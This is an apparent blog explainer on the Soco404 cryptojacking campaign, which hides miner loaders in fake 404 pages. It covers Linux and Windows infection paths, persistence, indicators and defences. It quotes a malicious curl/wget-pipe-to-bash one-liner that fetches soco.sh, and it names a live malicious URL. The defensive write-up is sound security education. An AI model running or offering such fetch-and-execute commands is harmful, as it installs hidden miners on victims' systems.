What is Soco404 malware and how are fake 404 error pages being used to attack Linux and Windows systems?

Table of Contents

• What Is the Soco404 Malware Campaign?
• Why Is Soco404 So Dangerous?
• How Does Soco404 Infect Systems?
• Linux Infection Details
• Windows Infection Path
• How Attackers Are Spreading It
• How Does the Malware Stay Hidden?
• Impact on Systems
• Real-World Discovery: Who Found It?
• How to Protect Your System from Soco404
• Conclusion
• Frequently Asked Questions (FAQs)

A new and dangerous cyber threat is making its way into Linux and Windows systems — and it comes disguised as something innocent: a 404 error page. This blog explains everything you need to know about Soco404, the malware campaign that hides crypto-miners inside fake error pages.

Let’s break it down in a simple, clear, and structured format so both professionals and beginners can understand and stay protected.

What Is the Soco404 Malware Campaign?

Soco404 is a cyber attack campaign that hides malware inside fake 404 error pages. These error pages are hosted on platforms like Google Sites or compromised Apache Tomcat servers, and contain malicious code hidden in Base64 format.

Once clicked, these pages drop and execute malware on the user’s machine — whether it's running Linux or Windows.

Why Is Soco404 So Dangerous?

• Cross-platform: Works on both Linux and Windows.

• Stealthy delivery: Uses 404 error pages, which are often ignored by security tools.

• Disguised payloads: Malware is encoded and hidden between normal HTML tags.

• Difficult to detect: Avoids traditional antivirus and disk scanning.

  
  

• Resource hijacking: It silently runs cryptominers, increasing power bills and degrading performance.

How Does Soco404 Infect Systems?

Here’s the step-by-step attack flow of the Soco404 malware campaign:

Linux Infection Details

On Linux systems, the malware is dropped via a command like:

sh -c "(curl http://:8080/soco.sh || wget -q -O- http://:8080/soco.sh) | bash"

• The script generates a random filename

• Deletes system logs (/var/log/wtmp)

• Kills other miners to dominate resources

• Uses Go-based stub to rename itself (e.g., cpuhp/1)

• Launches XMRig miner using Monero wallets

Windows Infection Path

On Windows, the process includes:

• Dropping ok.exe using certutil, curl, or Invoke-WebRequest

• Running the file as a hidden system process (conhost.exe)

• Injecting the mining code

• Automatically deleting the original executable

• Disabling Windows Event Logs to cover tracks

How Attackers Are Spreading It

Attackers are using:

• Compromised Tomcat servers

• Insecure PostgreSQL databases

• Misconfigured Atlassian Confluence servers

• Publicly exposed web applications

In some cases, compromised Korean transportation websites have been used to serve these fake 404 pages to end users.

How Does the Malware Stay Hidden?

• Disguises as:

  • sd-pam

  • kworker/R-rcu_p

  • Random 8-character Windows services

• Disables logs

• Uses cron jobs (Linux) and startup registry keys (Windows)

• Communicates over local sockets instead of external domains

• Keeps watchdog threads alive to restart if stopped

Impact on Systems

Many organizations don’t notice the breach because:

• No alerts are triggered

• Antivirus tools miss memory-based payloads

• Only signs are:

  • High CPU usage

  • Increased electricity bills

  • Slow system performance

Real-World Discovery: Who Found It?

The campaign was uncovered by Wiz.io researchers, who noticed strange shell activity coming from public PostgreSQL databases — a service that many cloud users leave unintentionally open.

How to Protect Your System from Soco404

Here are essential tips to stay safe from malware hidden in error pages:

 Best Practices:

• Avoid clicking on unknown error pages

• Block access to suspicious sites like fastsoco.top

• Monitor for unexpected CPU usage or performance drops

• Regularly check and patch:

  • Tomcat servers

  • PostgreSQL

  • Confluence

• Implement behavior-based endpoint detection

 Technical Defenses:

• Disable COPY FROM PROGRAM feature in PostgreSQL

• Use AppArmor or SELinux to restrict shell commands

• Set up network-based anomaly detection

Conclusion

The Soco404 malware campaign is a strong reminder that even the most harmless-looking elements like a 404 error page can be weaponized. By hiding payloads in HTML and running in memory, attackers are staying ahead of traditional defenses.

Whether you're a cybersecurity analyst, a system admin, or just an alert user — understanding this attack can help you take the right action before your resources are stolen in silence.

FAQs

What is the Soco404 malware campaign?

Soco404 is a cryptojacking campaign that hides malware in fake 404 error pages to infect Linux and Windows systems with platform-specific miners.

How does Soco404 bypass traditional malware scanners?

It embeds the payload in base64 between HTML tags, decoding directly in memory and avoiding disk-based detection tools.

Which platforms are affected by Soco404?

Both Linux and Windows systems are targeted with customized malware loaders.

What is the role of PostgreSQL in this malware attack?

The attackers exploit open PostgreSQL databases using the COPY FROM PROGRAM feature to execute malicious commands.

What is HTML smuggling in the context of Soco404?

It refers to the tactic of hiding malicious code within a webpage’s structure so it can be executed after being decoded on the client side.

How is the malware delivered?

Through fake 404 pages hosted on compromised servers and Google Sites. The payload is loaded using curl, wget, certutil, or PowerShell.

What is the purpose of soco.sh and ok.exe?

These are the Linux and Windows payloads respectively. They install miners, delete evidence, and ensure persistence.

How do Linux systems get infected?

A one-liner shell command downloads and executes the malware script, then modifies system settings for mining.

How do Windows systems get infected?

Files like ok.exe are downloaded to the public folder, executed, injected into conhost.exe, and then removed to avoid detection.

What indicators might hint at Soco404 infection?

Unexpected CPU usage, increased power bills, sluggish performance, and unusual process names like cpuhp/1 or fake Windows services.

What are the mining pools involved?

The malware connects to c3pool and moneroocean mining pools using hardcoded wallets.

What is the attack flow of Soco404?

Loader → fake 404 error page → decode base64 blob → execute payload in memory → install miner → ensure persistence.

Why is Soco404 difficult to detect?

It avoids writing to disk and uses process masquerading, watchdog threads, and memory injection.

What are some Linux process names used by the malware?

sd-pam, kworker/R-rcu_p, and cpuhp/1.

What methods does it use to maintain persistence?

Cron jobs, shell hooks, Windows registry changes, and watchdog threads that respawn malware processes.

Can traditional firewalls stop Soco404?

Not always. It uses legitimate ports and local socket communication, making it stealthier.

How can organizations prevent this malware?

Secure PostgreSQL databases, disable risky features like COPY FROM PROGRAM, and use advanced threat detection tools.

How are compromised websites used in this campaign?

Websites are turned into trusted-looking hosts for fake 404 pages that smuggle malware.

Is this campaign related to past Tomcat or Atlassian exploits?

Yes, it appears to be an evolved form of earlier botnets that targeted weak Tomcat credentials and unpatched Atlassian instances.

What should system admins look out for?

Base64 blobs in web traffic, unknown scheduled tasks, and unexpected services or processes.

Does Soco404 affect mobile devices?

No known mobile infections have been reported so far.

What scripting languages are used in the malware?

Shell scripting and Go are used for payload delivery and miner execution.

Why are fake 404 pages effective for malware delivery?

They appear harmless and evade security filters looking for suspicious URLs or file downloads.

Is the malware fileless?

Yes, it executes from memory and deletes itself post-infection.

What’s the financial motive behind this attack?

To mine cryptocurrency covertly using infected systems’ resources.

How can users identify a fake error page?

Most users cannot. Only through security tools and traffic analysis can these malicious pages be identified.

Which file or URL is key to the attack?

https://www.fastsoco.top/1 is one such 404 page used in this malware chain.

Are there any forensic challenges in Soco404?

Yes. The malware erases logs, deletes itself, and mimics real processes, making forensics difficult.

What regions are affected by Soco404?

The campaign includes compromised Korean websites and global targets, especially those with misconfigured cloud setups.

Can XMRig be linked to the attack?

Yes, the malware uses XMRig for Monero mining after infection.

What are watchdog threads in this context?

Background processes that restart the malware if killed by antivirus or manual intervention.

How does the malware spread laterally?

Via misconfigured databases and server access, allowing the attacker to deploy it across multiple OS environments.